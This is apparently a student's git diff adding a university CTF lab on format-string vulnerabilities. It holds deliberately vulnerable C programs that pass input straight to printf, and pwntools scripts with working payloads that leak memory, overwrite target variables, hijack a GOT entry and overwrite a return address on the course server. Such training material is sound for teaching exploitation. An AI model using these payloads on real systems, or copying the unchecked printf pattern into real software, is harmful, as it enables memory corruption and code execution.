diff --git a/pa/lab7/01_local_read b/pa/lab7/01_local_read new file mode 100755 index 0000000..f554352 Binary files /dev/null and b/pa/lab7/01_local_read differ diff --git a/pa/lab7/01_local_read.c b/pa/lab7/01_local_read.c new file mode 100644 index 0000000..85bc168 --- /dev/null +++ b/pa/lab7/01_local_read.c @@ -0,0 +1,20 @@ +// gcc -m32 -Wall -Wextra -ggdb -no-pie + +#include +#include +#include "get_flag.h" + +#define BUFFER_LEN 64 + +char buffer[BUFFER_LEN] = {0}; + +void vuln() { + // Never prints secret_value + char *secret_value = get_flag(); + printf(buffer); +} + +int main() { + read(0, buffer, BUFFER_LEN-1); + vuln(); +} diff --git a/pa/lab7/03_write b/pa/lab7/03_write new file mode 100755 index 0000000..4d66308 Binary files /dev/null and b/pa/lab7/03_write differ diff --git a/pa/lab7/03_write.c b/pa/lab7/03_write.c new file mode 100644 index 0000000..842dd4a --- /dev/null +++ b/pa/lab7/03_write.c @@ -0,0 +1,27 @@ +// gcc -m32 -Wall -Wextra -ggdb -no-pie + +#include +#include +#include "get_flag.h" + +#define BUFFER_LEN 128 + +unsigned int target = 0; + +void vuln() { + char buffer[BUFFER_LEN] = {0}; + read(0, buffer, BUFFER_LEN-1); + + printf(buffer); + + if (target != 0) { + printf("Success! You hit the target!\n"); + printf("Here is your flag: %s\n", get_flag()); + } else { + printf("Oops, not quite!\n"); + } +} + +int main() { + vuln(); +} diff --git a/pa/lab7/04_match_value b/pa/lab7/04_match_value new file mode 100755 index 0000000..439f2af Binary files /dev/null and b/pa/lab7/04_match_value differ diff --git a/pa/lab7/04_match_value.c b/pa/lab7/04_match_value.c new file mode 100644 index 0000000..0df6840 --- /dev/null +++ b/pa/lab7/04_match_value.c @@ -0,0 +1,27 @@ +// gcc -m32 -Wall -Wextra -ggdb -no-pie + +#include +#include +#include "get_flag.h" + +#define BUFFER_LEN 128 + +unsigned int target = 0; + +void vuln() { + char buffer[BUFFER_LEN] = {0}; + read(0, buffer, BUFFER_LEN-1); + + printf(buffer); + + if (target == 327) { + printf("Success! You hit the target!\n"); + printf("Here is your flag: %s\n", get_flag()); + } else { + printf("Oops, not quite! The target was: 327\nCurrent value is %d.\n", target); + } +} + +int main() { + vuln(); +} diff --git a/pa/lab7/05_write_specific_byte b/pa/lab7/05_write_specific_byte new file mode 100644 index 0000000..0e34d3e Binary files /dev/null and b/pa/lab7/05_write_specific_byte differ diff --git a/pa/lab7/05_write_specific_byte.c b/pa/lab7/05_write_specific_byte.c new file mode 100644 index 0000000..35ffdab --- /dev/null +++ b/pa/lab7/05_write_specific_byte.c @@ -0,0 +1,29 @@ +// gcc -m32 -Wall -Wextra -ggdb -no-pie + +#include +#include +#include "get_flag.h" + +#define BUFFER_LEN 128 + +unsigned int target_before = 0; +unsigned int target = 0; +unsigned int target_after = 0; + +void vuln() { + char buffer[BUFFER_LEN] = {0}; + read(0, buffer, BUFFER_LEN-1); + + printf(buffer); + + if (((target >> 24) & 0xff) == 2) { + printf("Success! You hit the target!\n"); + printf("Here is your flag: %s\n", get_flag()); + } else { + printf("Oops, not quite! The target was: 2\nCurrent value is %x.\n", target >> 24); + } +} + +int main() { + vuln(); +} diff --git a/pa/lab7/06_write_big_number b/pa/lab7/06_write_big_number new file mode 100755 index 0000000..3c61df3 Binary files /dev/null and b/pa/lab7/06_write_big_number differ diff --git a/pa/lab7/06_write_big_number.c b/pa/lab7/06_write_big_number.c new file mode 100644 index 0000000..430393c --- /dev/null +++ b/pa/lab7/06_write_big_number.c @@ -0,0 +1,29 @@ +// gcc -m32 -Wall -Wextra -ggdb -no-pie + +#include +#include +#include "get_flag.h" + +#define BUFFER_LEN 128 + +unsigned int target_before = 0; +unsigned int target = 0; +unsigned int target_after = 0; + +void vuln() { + char buffer[BUFFER_LEN] = {0}; + read(0, buffer, BUFFER_LEN-1); + + printf(buffer); + + if (target == 0xdeadbeef) { + printf("Success! You hit the target!\n"); + printf("Here is your flag: %s\n", get_flag()); + } else { + printf("Oops, not quite! The target was: 0xdeadbeef\nCurrent value is 0x%08x\n", target); + } +} + +int main() { + vuln(); +} diff --git a/pa/lab7/07_call_functions b/pa/lab7/07_call_functions new file mode 100755 index 0000000..ce4047c Binary files /dev/null and b/pa/lab7/07_call_functions differ diff --git a/pa/lab7/07_call_functions.c b/pa/lab7/07_call_functions.c new file mode 100644 index 0000000..ce68c62 --- /dev/null +++ b/pa/lab7/07_call_functions.c @@ -0,0 +1,24 @@ +// gcc -m32 -Wall -Wextra -ggdb -no-pie + +#include +#include +#include + +#define BUFFER_LEN 128 + +void win() { + printf("You win!"); + system("cat /home/ctf/flag"); +} + +void vuln() { + char buffer[BUFFER_LEN] = {0}; + read(0, buffer, BUFFER_LEN-1); + + printf(buffer); + puts("Bye!\n"); +} + +int main() { + vuln(); +} diff --git a/pa/lab7/08_return b/pa/lab7/08_return new file mode 100755 index 0000000..d28acc7 Binary files /dev/null and b/pa/lab7/08_return differ diff --git a/pa/lab7/08_return.c b/pa/lab7/08_return.c new file mode 100644 index 0000000..89f7609 --- /dev/null +++ b/pa/lab7/08_return.c @@ -0,0 +1,23 @@ +// gcc -m32 -Wall -Wextra -ggdb -no-pie + +#include +#include +#include + +#define BUFFER_LEN 128 + +void win() { + printf("You win!"); + system("cat /home/ctf/flag"); +} + +void vuln() { + char buffer[BUFFER_LEN] = {0}; + read(0, buffer, BUFFER_LEN-1); + + printf(buffer); +} + +int main() { + vuln(); +} diff --git a/pa/lab7/chall_call_functions_again.py b/pa/lab7/chall_call_functions_again.py new file mode 100644 index 0000000..8ebaeaf --- /dev/null +++ b/pa/lab7/chall_call_functions_again.py @@ -0,0 +1,42 @@ +from pwn import remote, process, p32, ELF + +# Does not deal with \0s in any pointers needed +def print_to_ram(base: int, arg_base: int, data: bytes) -> bytes: + addrs: bytes = b"" + writes: bytes = b"" + cum_chars: int = 4 * len(data) + + for offset in range(len(data)): + addr = base + offset + addrs += p32(addr) + arg_n = arg_base + offset + n = data[offset] - (cum_chars % 256) + if n < 8: n += 256 + print(f"addr={hex(addr)} byte={hex(data[offset])} cum_chars={cum_chars}({hex(cum_chars%256)}) n={n}") + write = f"%{n}x%{arg_n}$hhn" + print(write) + writes += write.encode('utf-8') + cum_chars += n + + pl = addrs + writes + if b"\0" in pl: raise Exception("Payload requires a \\0") + return pl + +HOST = "mustard.stt.rnl.tecnico.ulisboa.pt" +PORT = 25197 + +conn = remote(HOST, PORT) +#conn = process("07_call_functions") +#input() + +elf = ELF("07_call_functions") +got_puts = elf.got['puts'] +win = elf.sym['win'] +pl = print_to_ram(got_puts, 7, p32(win)) + b"\n" +print(f"Payload: ({len(pl)})", pl, "\n\n") + +#pl = b"AAAABBBB.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x\n" + +conn.send(pl) +while conn.connected(): + print(chr(conn.recv(1)[0]), end="", flush=True) diff --git a/pa/lab7/chall_local_read.py b/pa/lab7/chall_local_read.py new file mode 100644 index 0000000..a4dc508 --- /dev/null +++ b/pa/lab7/chall_local_read.py @@ -0,0 +1,12 @@ +from pwn import remote + +HOST = "mustard.stt.rnl.tecnico.ulisboa.pt" +PORT = 25191 + +conn = remote(HOST, PORT) + +pl = b"%7$s\n" + +conn.send(pl) +while conn.connected(): + print(chr(conn.recv(1)[0]), end="", flush=True) diff --git a/pa/lab7/chall_return_address_again.py b/pa/lab7/chall_return_address_again.py new file mode 100644 index 0000000..692ab44 --- /dev/null +++ b/pa/lab7/chall_return_address_again.py @@ -0,0 +1,41 @@ +from pwn import remote, process, p32, ELF + +# Does not deal with \0s in any pointers needed +def print_to_ram(base: int, arg_base: int, data: bytes) -> bytes: + addrs: bytes = b"" + writes: bytes = b"" + cum_chars: int = 4 * len(data) + + for offset in range(len(data)): + addr = base + offset + addrs += p32(addr) + arg_n = arg_base + offset + n = data[offset] - (cum_chars % 256) + if n < 8: n += 256 + write = f"%{n}x%{arg_n}$hhn" + writes += write.encode('utf-8') + cum_chars += n + + pl = addrs + writes + if b"\0" in pl: raise Exception("Payload requires a \\0") + return pl + +HOST = "mustard.stt.rnl.tecnico.ulisboa.pt" +PORT = 25198 + +conn = remote(HOST, PORT) +#conn = process("08_return") +#input() + +elf = ELF("08_return") +# dest local is ffffcc1c, which is 1$ + 144 +# remote 1$ is ffffdc6c, so dest should be ffffdc5c +dest = 0xffffdcfc +win = elf.sym['win'] +pl = print_to_ram(dest, 7, p32(win)) + b"%3$08x\n" +print(f"Win={hex(win)} Payload: ({len(pl)})", pl, "\n\n") + +#pl = b"AAAABBBB.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x\n" + +conn.send(pl) +conn.interactive() diff --git a/pa/lab7/chall_short_local_read.py b/pa/lab7/chall_short_local_read.py new file mode 100644 index 0000000..17c10cb --- /dev/null +++ b/pa/lab7/chall_short_local_read.py @@ -0,0 +1,12 @@ +from pwn import remote + +HOST = "mustard.stt.rnl.tecnico.ulisboa.pt" +PORT = 25192 + +conn = remote(HOST, PORT) + +pl = b"%7$s\n" + +conn.send(pl) +while conn.connected(): + print(chr(conn.recv(1)[0]), end="", flush=True) diff --git a/pa/lab7/chall_write_big_numbers.py b/pa/lab7/chall_write_big_numbers.py new file mode 100644 index 0000000..61e1684 --- /dev/null +++ b/pa/lab7/chall_write_big_numbers.py @@ -0,0 +1,38 @@ +from pwn import remote, process, p32 + +# Does not deal with \0s in any pointers needed +def print_to_ram(base: int, arg_base: int, data: bytes) -> bytes: + addrs: bytes = b"" + writes: bytes = b"" + cum_chars: int = 4 * len(data) + + for offset in range(len(data)): + addr = base + offset + addrs += p32(addr) + arg_n = arg_base + offset + n = data[offset] - (cum_chars % 256) + if n < 8: n += 256 + print(f"addr={hex(addr)} byte={hex(data[offset])} cum_chars={cum_chars}({hex(cum_chars%256)}) n={n}") + write = f"%{n}x%{arg_n}$hhn" + print(write) + writes += write.encode('utf-8') + cum_chars += n + + pl = addrs + writes + if b"\0" in pl: raise Exception("Payload requires a \\0") + return pl + +HOST = "mustard.stt.rnl.tecnico.ulisboa.pt" +PORT = 25196 + +conn = remote(HOST, PORT) +#conn = process("06_write_big_number") +#input() + +pl = print_to_ram(0x804c044, 7, p32(0xdeadbeef)) + b"\n" +print(f"Payload: ({len(pl)})", pl, "\n\n") +#pl = "AAAABBBB.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x\n" + +conn.send(pl) +while conn.connected(): + print(chr(conn.recv(1)[0]), end="", flush=True) diff --git a/pa/lab7/chall_write_specific_byte.py b/pa/lab7/chall_write_specific_byte.py new file mode 100644 index 0000000..09c2ba6 --- /dev/null +++ b/pa/lab7/chall_write_specific_byte.py @@ -0,0 +1,18 @@ +from pwn import remote, process, p32 + +HOST = "mustard.stt.rnl.tecnico.ulisboa.pt" +PORT = 25195 + +conn = remote(HOST, PORT) +#conn = process("05_write_specific_byte") +#input() + +tgt_addr = p32(0x804c044+3) + +#2 + 256 - 4(ptr) = 254 +pl = tgt_addr+b"%0254x%7$hhn\n" +#pl = "AAAA.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x\n" + +conn.send(pl) +while conn.connected(): + print(chr(conn.recv(1)[0]), end="", flush=True) diff --git a/pa/lab7/chall_write_specific_value.py b/pa/lab7/chall_write_specific_value.py new file mode 100644 index 0000000..cf8f7ac --- /dev/null +++ b/pa/lab7/chall_write_specific_value.py @@ -0,0 +1,18 @@ +from pwn import remote, process, p32 + +HOST = "mustard.stt.rnl.tecnico.ulisboa.pt" +PORT = 25194 + +conn = remote(HOST, PORT) +#conn = process("04_match_value") +#input() + +tgt_addr = p32(0x804c040) + +#327 - 4(ptr) = 323 +pl = tgt_addr+b"%0323x%7$hn\n" +#pl = "AAAA.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x\n" + +conn.send(pl) +while conn.connected(): + print(chr(conn.recv(1)[0]), end="", flush=True) diff --git a/pa/lab7/chall_write_to_memory.py b/pa/lab7/chall_write_to_memory.py new file mode 100644 index 0000000..553daba --- /dev/null +++ b/pa/lab7/chall_write_to_memory.py @@ -0,0 +1,16 @@ +from pwn import remote, process, p32 + +HOST = "mustard.stt.rnl.tecnico.ulisboa.pt" +PORT = 25193 + +conn = remote(HOST, PORT) +#conn = process("03_write") +#input() + +tgt_addr = p32(0x804c040) + +pl = tgt_addr+b"AAAA.%7$hhn\n" + +conn.send(pl) +while conn.connected(): + print(chr(conn.recv(1)[0]), end="", flush=True)